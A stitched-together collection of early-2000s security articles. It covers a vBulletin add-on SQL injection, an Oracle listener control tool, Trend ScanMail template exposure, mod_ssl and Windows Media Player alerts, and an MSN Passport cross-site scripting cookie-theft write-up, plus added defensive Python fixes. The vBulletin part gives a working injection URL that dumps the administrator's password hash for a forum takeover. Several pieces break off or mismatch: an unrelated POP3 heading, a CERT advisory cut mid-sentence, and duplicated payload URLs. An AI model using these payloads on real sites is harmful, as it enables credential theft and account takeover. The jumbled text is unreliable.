Topic Articles: POP3 Server provided with the CPanel suite
The POP3 server shipped with the cPanel suite (tested on version cppop 20.0) ignores the full length of the e-mail login password:
only the first 8 characters are checked. This reduces the work factor needed to crack an e-mail account.
Information
vBulletin PHP forums enable add-on features through what are called "hacks",
which are pieces of code that extend the forum's functionality. One of the
well-known hacks scrolls the last 10 posts through an IFRAME embedded in
the forum header template.
Discussion
The Last Posts hack started with the version whose header reads:
    //...........Last X Posts v1.0.5...........
    //......by Kevin (kevin@tubescan.com)......
It had a file called "last10config.php" with the line
    $showforumtitle = "0"; // shows the forum title (linked to that forum) next to the thread title
which controlled this part of the script:
    if ($showforumtitle == "1") {
        $ftitle = ",forum";
        $fsel = ",forum.title AS ftitle";
        $wheresql .= " AND thread.forumid=forum.forumid";
    }
Later versions, such as
    //...............Last 10 Posts v2.0.1...........
    //.........by Kevin (kevin@tubescan.com)........
    //.....Edit by lad_pc (lad_pc@hotmail.com)......
removed the option, and the corresponding block of code from that file, yet the SQL statement remained the same:
    $query = "SELECT thread.lastpost,thread.title,thread.lastposter,thread.replycount,
        thread.views,user.userid,thread.threadid,thread.forumid$fsel,thread.iconid
        FROM thread,user$ftitle $wheresql ORDER BY thread.$ob $obdir LIMIT $maxthreads";
which leaves both $fsel and $ftitle, now never assigned by the script, open to SQL injection.
Exploit
Any unpatched website running any version of vBulletin with this hack is
vulnerable as follows:
/last.php?fsel=,user.password%20as%20title,user.%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20WHERE%20usergroupid=1%20LIMIT%201/*
This will output the vBulletin administrator's encrypted password; with some cookie
editing you can log on to the forum again as the OWNER :) quite annoying.
Solution
For an easy fix, if you do not want to change much, just add these two lines
before the SQL query in the file "ttlast.php". It should look as follows:
    $fsel="";
    $ftitle="";
    $query = "SELECT thread.lastpost,thread.title,thread.lastposter,thread.replycount,
        thread.views,user.userid,thread.threadid,thread.forumid$fsel,thread.iconid
        FROM thread,user$ftitle $wheresql ORDER BY thread.$ob $obdir LIMIT $maxthreads";
Save the file and you are patched.
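The same fix expressed as a whitelist-driven query builder (an added example in Python, not part of the original post or of the hack's code): the forum-title option and the ordering fields map to fixed SQL fragments, the LIMIT is bound as a parameter, and anything a request supplies under fsel or ftitle is never consulted. The in-memory schema, the join condition on thread.lastposterid and the sample rows are constructed assumptions.

```python
import sqlite3

# Constructed in-memory schema with only the columns the hack's query names,
# plus thread.lastposterid for the thread/user join (an assumption: the
# real join condition lives in $wheresql, which the post does not show).
SCHEMA = """
CREATE TABLE forum  (forumid INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE user   (userid INTEGER PRIMARY KEY, username TEXT, password TEXT);
CREATE TABLE thread (threadid INTEGER PRIMARY KEY, forumid INTEGER, title TEXT,
                     lastpost INTEGER, lastposter TEXT, replycount INTEGER,
                     views INTEGER, iconid INTEGER, lastposterid INTEGER);
INSERT INTO forum VALUES (1, 'General');
INSERT INTO user VALUES (1, 'admin', 'HASH-PLACEHOLDER');
INSERT INTO thread VALUES (10, 1, 'Hello', 200, 'admin', 2, 40, 0, 1),
                          (11, 1, 'Second', 300, 'admin', 0, 5, 0, 1);
"""

# The only request-influenced values, each mapped to a fixed SQL fragment.
# $ob and $obdir are interpolated the same way in the original query, so
# they are constrained here as well.
ORDER_COLUMNS = {"lastpost": "thread.lastpost", "views": "thread.views",
                 "replycount": "thread.replycount"}
ORDER_DIRS = {"asc": "ASC", "desc": "DESC"}


def build_last_posts_query(show_forum_title, order_by="lastpost",
                           order_dir="desc", max_threads=10):
    """Return (sql, params). No request string is ever pasted into the SQL."""
    if order_by not in ORDER_COLUMNS or order_dir not in ORDER_DIRS:
        raise ValueError("unsupported ordering")
    max_threads = int(max_threads)          # "1/*" and friends fail here
    if not 1 <= max_threads <= 100:
        raise ValueError("max_threads out of range")
    fsel = ftitle = join = ""
    if show_forum_title:                    # the $showforumtitle == "1" case
        fsel = ", forum.title AS ftitle"
        ftitle = ", forum"
        join = " AND thread.forumid = forum.forumid"
    sql = ("SELECT thread.lastpost, thread.title, thread.lastposter, "
           "thread.replycount, thread.views, user.userid, thread.threadid, "
           f"thread.forumid{fsel}, thread.iconid "
           f"FROM thread, user{ftitle} "
           f"WHERE thread.lastposterid = user.userid{join} "
           f"ORDER BY {ORDER_COLUMNS[order_by]} {ORDER_DIRS[order_dir]} "
           "LIMIT ?")
    return sql, (max_threads,)


def last_posts(request, show_forum_title=False):
    """request: dict of query-string parameters as last.php would see them.
    A supplied 'fsel' or 'ftitle' key is simply never read, which is what
    the two-line patch achieves by resetting those variables."""
    sql, params = build_last_posts_query(
        show_forum_title,
        request.get("ob", "lastpost"),
        request.get("obdir", "desc"),
        request.get("maxthreads", 10))
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con.execute(sql, params).fetchall()


def rejects(request):
    """True when the request is refused before it reaches the database."""
    try:
        last_posts(request)
    except ValueError:
        return True
    return False
```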
Published on http://www.securityfocus.com/bid/11825/
Most admins neglect to set a password on the TNS listener (tnslsnr) of their Oracle databases. Oracle assumes that you can only connect to the listener on localhost, or by mapping a remote Oracle database through .ora files.
This is not the case anymore.
Based on Jwa's Perl client.
This client is a full client, with packet crafting reassembled.
It supports all the commands of the version that
is shipped with Oracle.
It allows you to fully control an unprotected Oracle database server remotely, without having to map or install Oracle.
Download Here
Commands Supported
ping, version, service, status, change_password, help, reload, save_config, set connect_timeout,
set display_mode, set log_directory, set log_file, set log_status, show, spawn, stop
This version works on Oracle9i.
On Oracle 10g only the "version" command works.
This is feedback I got from Pete Finnigan (Oracle security):
The 10g listener is by default protected by local authentication rather than by a password like in the 9i and lower listener. This means that because it is protected you cannot use commands like status, which can only be used on an unprotected listener. This is the reason that the version command still works, because it can be executed on a password or locally authenticated listener. To be able to get the lsnrctl tool to work remotely you need to disable local authentication.
Currently I am working on a 10g version with a DoS check; well, if you can't own it, see if you can bring it down!!
If you have Oracle 10g on a public IP and want to share it for testing, let me know; just send me the IP by e-mail.
Public Release for ScanMail Vulnerability
I was not sure whether to release this one or not, but apparently I did.
While reading
http://www.trendmicro.com/ftp/documentation/guides/smd3-admin-guide.pdf,
starting at page 108, things became interesting. What if some admin did not
follow the guide!
On a Lotus Domino server, Trend ScanMail can be installed as the server's
antivirus. According to the guide, some interesting templates enable the
administrator to control ScanMail through a web-enabled interface. These
templates are smency.nsf, smconf.nsf, smvlog.nsf, smquar.nsf, smmsg.nsf,
smtime.nsf, smhelp.nsf and smftypes.nsf.
I coded a quick scanner that searches for these files using NASL/Nessus,
http://cgi.nessus.org/plugins/dump.php3?id=14312,
and thanks to the guys at Nessus for upgrading my original script.
Anyway, these files in general can allow you to:
gather more information about the target system;
edit/delete virus pattern files, then e-mail your own trojanized messages,
which victims will treat as trusted, scanned e-mail;
with some tweaking, upload a web-shell script and increase your access.
Tools Released
Checks for most of the Lotus server templates in general. Download Here.
If the URL is not found, the risk is reported as Clear.
If found but password protected, the risk is Low.
If found with no protection, the risk is High.
Also checks for dying servers and firewall-protected HTTP error messages.
http://cgi.nessus.org/plugins/dump.php3?id=14312
To read more about the templates you can target:
http://it.trendmicro-europe.com/enterprise/support/knowledge_base_detail.php?solutionId=19621
Topic Articles: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
SecurityTracker Alert ID: 1004636
CVE Reference: CAN-2002-0653
Date: Jun 27 2002
Impact: Denial of service via local system, Execution of arbitrary code via local system, Modification of user information, User access via local system
Fix Available: Yes
Vendor Confirmed: Yes
Version(s): 2.4.9 and prior
Description: A vulnerability was reported in mod_ssl. A local user that can create '.htaccess' files may be able to cause mod_ssl to crash or execute arbitrary code on the system with the privileges of the web server.
An 'off-by-one' error has been reported in mod_ssl. The flaw reportedly exists in the ssl_compat_directive() while invoking the Apache web server rewrite_command extended API (EAPI) hook. According to the report, when backward compatibility is enabled, mod_ssl registers a rewrite_command hook and calls the ssl_compat_directive() function for every line read in a configuration file.
A local user that can create a '.htaccess' file on the web server can place specially crafted information in the file to cause Apache mod_ssl to execute arbitrary code when reading the file (e.g., when a remote user attempts to access a file in a directory protected by the '.htaccess' file).
Servers that allow virtual hosts and have the "AllowOverride" directive not set to "None" for virtual hosts may be affected if local users have access to any part of the web directory. Other configurations may also be vulnerable.
According to the report, mod_ssl compiled without backward compatibility is not vulnerable. However, the backward compatibility feature is reportedly enabled by default during compilation.
Impact: A local user could cause denial of service conditions or could possibly execute arbitrary code with the privileges of the web server.
Solution: The vendor has released a fixed version (2.8.10), available at:
http://www.modssl.org/
Vendor URL: www.modssl.org/
Cause: Boundary error
Underlying OS: Linux (Any), UNIX (Any)
Reported By: Jedi/Sector One
Message History: This archive entry has one or more follow-up message(s) listed below.
Jul 2 2002 (Debian Issues Fix) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (Robert van der Meulen)
Debian has issued a fix.
Jul 3 2002 (EnGarde Issues Fix) Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (engarde-announce-admins@guardiandigital.com)
EnGarde has released a fix.
Jul 5 2002 (Sun Issues Workaround for Cobalt RaQ) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
Sun has issued a workaround for Cobalt RaQ.
Jul 18 2002 (Red Hat Issues Fix) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (bugzilla@redhat.com)
Red Hat has issued a fix.
Jul 19 2002 (HP Issues Fix for HP Secure OS for Linux) Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (support_feedback@us-support-mail.external.hp.com (IT Resource Center))
HP has released a fix for HP Secure OS for Linux.
Jul 20 2002 (NetScreen Issues Fix for Global PRO Policy Manager) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
NetScreen has issued a patch for their Global PRO and PRO Express Policy Manager Server.
Jul 31 2002 (SuSE Issues Fix) Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (Roman Drahtmueller)
SuSE has released a fix.
Aug 4 2002 (Apple Issues Fix) Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (Product Security)
Apple has released a fix.
Aug 9 2002 (Mandrake Issues Fix) Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code (Mandrake Linux Security Team)
Mandrake has released a fix.
Sep 24 2002 (HP Issues Fix for Virtualvault) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
HP has issued a fix for HP-UX Virtualvault.
Jan 28 2003 (Sun Issues Fix for Cobalt RaQ) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
Sun has issued a fix for mod_ssl on Sun Cobalt RaQ devices.
Jan 28 2003 (Sun Issues Fix for Cobalt Qube) Re: Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
Sun has issued a fix for the Cobalt Qube device.
Topic Articles: Windows Media Player May Let Remote Users Execute Code on a Target User's Computer
SecurityTracker Alert ID: 1004638
CVE Reference: CAN-2002-0372, CAN-2002-0373, CAN-2002-0374
Date: Jun 27 2002
Impact: Disclosure of system information, Execution of arbitrary code via local system, Execution of arbitrary code via network, Root access via local system, User access via network
Fix Available: Yes
Vendor Confirmed: Yes
Version(s): 6.4, 7.1, XP
Description: Microsoft reported several vulnerabilities in Windows Media Player. A remote user could execute arbitrary programs or arbitrary scripting code on the user's computer. Also, a local user can execute arbitrary code on the system with System level privileges.
Microsoft described several new vulnerabilities in Windows Media Player. These issues are discussed separately below.
First, an information disclosure vulnerability involving the Internet Explorer (IE) Cache directories could allow a remote user to run code on a target user's computer. The code would run with the privileges of the user running Windows Media Player.
This bug is reportedly caused by the player's processing of certain types of licenses for secure media files when the media file is stored in the IE cache. A remote user can supply a certain type of secure Windows Media file (using WM DRM version 1.0) to the user such that, when the file is opened, the media player will incorrectly return information to the server that discloses the location of the IE cache while it is processing the request to the web site specified for handling the licensing information.
A remote user could learn the location of the IE cache on the target user's local file system and, separately, cause an executable program to be stored in the cache (by sending the user HTML-based e-mail or getting the user to visit a particular web page). The remote user could then directly access (and execute) the stored executable.
In certain configurations, it is reportedly possible for an HTML email to attempt to play a media file automatically, allowing an exploit to occur when the target user views or previews a malicious e-mail message.
Second, a local authenticated user could execute arbitrary commands with System level privileges to take full control of the operating system. The bug reportedly exists in the Windows Media Device Manager (WMDM) Service processing of requests to access invalid local storage devices. WMDM is a component of Windows Media Player and is only used in Windows 2000. So, this flaw reportedly only affects Windows Media Player 7.1 on Windows 2000 systems.
A local user may be able to provide a specially crafted request to connect to an invalid device to gain access to a local resource and execute any local program with LocalSystem privileges.
According to Microsoft, a console session is required to exploit this privilege escalation flaw.
Lastly, a remote user could supply and invoke an HTML script on a target user's computer. The script could take any actions acting as the target user.
The flaw is reportedly due to the storage of the Windows Media active playlist information on the local system in a known location. Playlists typically have a '.asx' extension and are XML-based (and can include HTML script). So, a remote user can exploit this to store and then invoke HTML script in the Local Computer security zone.
A remote user can create a specially formatted media file (that includes a malicious playlist). If this playlist is in the memory when the Windows Media Player is exited (on the target user's computer), the player will write the playlist to a known location on the target user's computer. The remote user can then create a malicious web page that, when subsequently viewed by the target user, will cause the playlist to be executed. The HTML script in the playlist will then run on the target user's computer in the Local Computer zone.
According to the security bulletin, this bug requires several specific, ordered exploit steps:
1) The target user plays specially crafted media file supplied by the remote user.
2) The target user shuts down the media player after playing the file and before playing any other files.
3) The target user views a web page supplied by the remote user.
Microsoft credits jelmer for reporting the Cache Path Disclosure bug, the Research Team of Security Internals for reporting the Privilege Elevation via Windows Media Device Manager Service issue, and Elias Levy for reporting the Media Playback Script Invocation bug.
Impact: A remote user can cause arbitrary code or arbitrary scripts to be executed on the target user's computer.
A local user can execute commands with System privileges to gain full control of the operating system.
Solution: The vendor has released patches.
For Microsoft Windows Media Player 6.4:
http://download.microsoft.com/download/winmediaplayer/Update/320920/W98NT42KMe/EN-US/wm320920_64.exe
For Microsoft Windows Media Player 7.1:
http://download.microsoft.com/download/winmediaplayer/Update/320920/W982KMe/EN-US/wm320920_71.exe
For Microsoft Windows Media Player for Windows XP:
http://download.microsoft.com/download/winmediaplayer/Update/320920/WXP/EN-US/wm320920_8.exe
The patches for 6.4 and 7.1 can reportedly be installed on any operating system running Windows Media Player 6.4 or 7.1. The patch for Windows Media Player for Windows XP can be installed on Windows XP Gold.
Microsoft plans to include the fix in Windows XP SP1.
This patch supersedes the patches referenced in Microsoft's previous security bulletin MS01-056.
Microsoft plans to issue Knowledge Base article Q320920 regarding this issue, to be available shortly at the Microsoft Online Support web site:
http://search.support.microsoft.com/kb/c.asp?SD=SO&LN=EN-US
Vendor URL: www.microsoft.com/technet/security/bulletin/MS02-032.asp
Cause: Access control error, Configuration error, Input validation error
Underlying OS: Windows (Any)
Reported By: secnotif@microsoft.com
Message History: None.
CERT Advisory CA-2002-13 Buffer Overflow in Microsoft's MSN Chat ActiveX Control
Original release date: May 10, 2002
Last revised: --
Source: CERT/CC
A complete revision history can be found at the end of this file.
Systems Affected
Microsoft Windows systems with one or more of the following:
* Microsoft MSN Chat control
* Microsoft MSN Messenger 4.6 and prior
* Microsoft Exchange Instant Messenger 4.6 and prior
Overview
Microsoft's MSN Chat is an ActiveX control for Microsoft Messenger, an
instant messaging client. A buffer overflow exists in the ActiveX
control that may permit a remote attacker to execute arbitrary code on
the system with the privileges of the current user.
I. Description
A buffer overflow exists in the "ResDLL" parameter of the MSN Chat
ActiveX control that may permit a remote attacker to execute arbitrary
code on the system with the privileges of the current user. This
vulnerability affects MSN Messenger and Exchange Instant Messenger
users. Since the control is signed by Microsoft, users of Microsoft's
Internet Explorer (IE) who accept and install Microsoft-signed ActiveX
controls are also affected. The Microsoft MSN Chat control is also
available for direct download from the web.
The
Microsoft Passport
Microsoft Passport: "A single name, password and wallet for the web". This means that with the same credentials you can access your e-mail (Hotmail), instant messenger service (MSN Messenger), calendar (task manager, reminders and so on), and loads of other useful services. All these services are centralised and authenticate against a central system called MS Passport. Of course, just as any authorised user can move from one service that uses the Passport technology to another without supplying a password, a cracker (malicious hacker) can do the same without much trouble once he manages to look like the authorised user. This kind of service is intended for personal use, so people certainly wouldn't like others to read their e-mail or view their daily schedule.
Implementation
Microsoft is trying to build everything around their network, using Passport authentication. This is compliant with the .NET framework, which allows everything to be seamlessly integrated so that users can jump from one service to another without any problems.
As currently implemented, users can authenticate to Passport via a number of ways:
Hotmail and Passport sites
MSN messenger
MSN Explorer
Outlook Express
Other MS applications.
Fooling the system
JavaScript allows users to set and retrieve cookies. This is very useful for normal HTTP sites as well as web applications. However, web applications need a lot more control than normal websites. This control is normally achieved by filtering possibly malicious code out of the HTML.
Users do not need permission to send e-mails to authenticated users, which gives them the possibility of posting data into an authenticated user's mailbox. This is obvious to some extent, since we are talking about e-mail: no one needs authentication to send an e-mail to a Hotmail account. Therefore the e-mail sent to the Hotmail user has to be treated as non-trusted content.
Hotmail takes very good care to filter out JavaScript, ActiveX and Java applets. Lately it also started checking for images that link outside the Hotmail account. Images linking to non-trusted sites mean that those sites can easily track the status of the e-mail (whether it was read or not). So a tag in an HTML mail such as:
<img src="http://spam.me.com/tracking.gif">
would get filtered by the Hotmail filtering system. To get around this filtering, one has just to encode the http:// part as &#x68;ttp://. 68 is the hex value of h, so the web browser converts the encoded value back to its original character. Of course, the Hotmail filtering system does not work exactly like the web browser, and this is where the flaw stands out.
However this is not the major issue I am writing about in this document.
Cross Site Scripting
When a logged-in user follows a non-trusted link, the Hotmail credentials do not get sent to the website. The Hotmail filtering system also takes care to hide the URL of the user's Hotmail account to ensure his privacy (and maybe to prevent other attacks).
On the other hand, when a user follows an MSN (Passport and therefore trusted) site from a non-trusted e-mail, the credentials get sent to the Passport site, and no precautions are taken. This means that the Passport authentication is not broken and therefore the different services provided by MS Passport operate seamlessly as described earlier.
This also means that if an ASP script which resides on any MS Passport enabled site allows the user to customise the page (even if not intended) such as inserting JavaScript code, the whole system is flawed.
In my exploit, a user only needs to click on a trusted link and he (or she) will be sending his (or her) credentials to a remote server.
How is this achieved?
To further explain the issue, I will provide an example of a flawed ASP script on an MS Passport site: ErrorMsg.asp, which resides at http://auctions.msn.com/Scripts/
This ASP script can be passed 2 (or possibly more) arguments:
· Source
· ErrMsg
Here we are concerned with the ErrMsg argument. It allows different scripts to generate different errors and display them to the user in some nice HTML.
ErrMsg will usually be filled in with something like "User is not authenticated". Now what if it is filled with <b>This should be bold</b>? To my astonishment (at the time of writing this is not fixed yet), I got the HTML tag to work, with no filtering from the ASP script.
To further illustrate this, the url which is passed is actually:
http://auctions.msn.com/Scripts/ErrorMsg.asp?Source=O&ErrMsg=This%20should%20be%20bold.
If no filtering is done for JavaScript, we can very easily inject our own JavaScript code to retrieve the session cookie stored in the Hotmail user’s browser. Sadly, lately (during the writing of this document), Microsoft seemed to try to fix this by filtering JavaScript (and embedded scripts) tags and entities. This means when the ASP script is passed the following:
· Script
· Alert
· JavaScript:
· And other commonly used javascript methods
the ASP script simply ignores the input, successfully filtering common Cross Site Scripting attacks.
However Microsoft did not fully patch the issue, so that if HTML encoding were used, the filtering system would not detect the embedded script code, and the code would still be executed.
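The two evasions described above, the entity-encoded http:// in the image tag and the entity-encoded script entries in ErrMsg, share one root cause: the filter inspects the raw text while the browser acts on the decoded text. An added Python example (not the author's or Microsoft's code) shows a blacklist of that kind passing constructed samples, the same blacklist catching them once the input is canonicalised (percent-decoded and entity-decoded until stable), and the fix that needs no blacklist at all for ErrMsg: HTML-escaping the value on output. The sample inputs and the hostnames in them are constructed.

```python
import html
import urllib.parse

# A substring blacklist of the kind the article describes: Hotmail's check
# for outside links and ErrorMsg.asp's check for script keywords.
BLOCKED = ("http://", "<script", "javascript:", "alert(")


def naive_filter(value):
    """The flawed check: True when the raw text passes the blacklist."""
    low = value.lower()
    return not any(token in low for token in BLOCKED)


def canonicalize(value, max_rounds=5):
    """Percent-decode and entity-decode until the text stops changing; that
    is the form the browser eventually acts on, so it is the form to inspect."""
    for _ in range(max_rounds):
        decoded = html.unescape(urllib.parse.unquote(value))
        if decoded == value:
            return value
        value = decoded
    raise ValueError("input still changing after %d decode rounds" % max_rounds)


def canonical_filter(value):
    """The same blacklist applied to the canonical form."""
    return naive_filter(canonicalize(value))


def render_errmsg(raw_param):
    """Output encoding, the fix ErrorMsg.asp actually needs: whatever arrives
    in ErrMsg is shown as text, never parsed as markup, so no blacklist is
    required and encoding tricks have nothing to bypass."""
    message = urllib.parse.unquote(raw_param)
    return '<p class="error">%s</p>' % html.escape(message, quote=True)


# Constructed samples (not taken from the article); hostnames are placeholders.
TRACKING_IMG = '<img src="&#x68;ttp://tracker.example/t.gif">'
ENCODED_LINK = '<a href="&#x6A;avascript:void(0)">click</a>'
ERRMSG_PARAM = "User%20is%20not%20%3Cb%3Eauthenticated%3C/b%3E"

if __name__ == "__main__":
    for sample in (TRACKING_IMG, ENCODED_LINK):
        print(naive_filter(sample), canonical_filter(sample), canonicalize(sample))
    print(render_errmsg(ERRMSG_PARAM))
```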
This means that to produce an alert box to display the session cookies, instead of simply using something like:
http://auctions.msn.com/Scripts/ErrorMsg.asp?Source=O&ErrMsg=
We have to encode the URL such as:
http://auctions.msn.com/Scripts/ErrorMsg.asp?Source=O&ErrMsg=
To complete the exploit the malicious user has to send a URL, which actually passes the Cookie to a 3rd party CGI script (probably made by the cracker exploiting this issue) instead of displaying them to the Hotmail user in a Message box. The end picture could look very similar to the one below.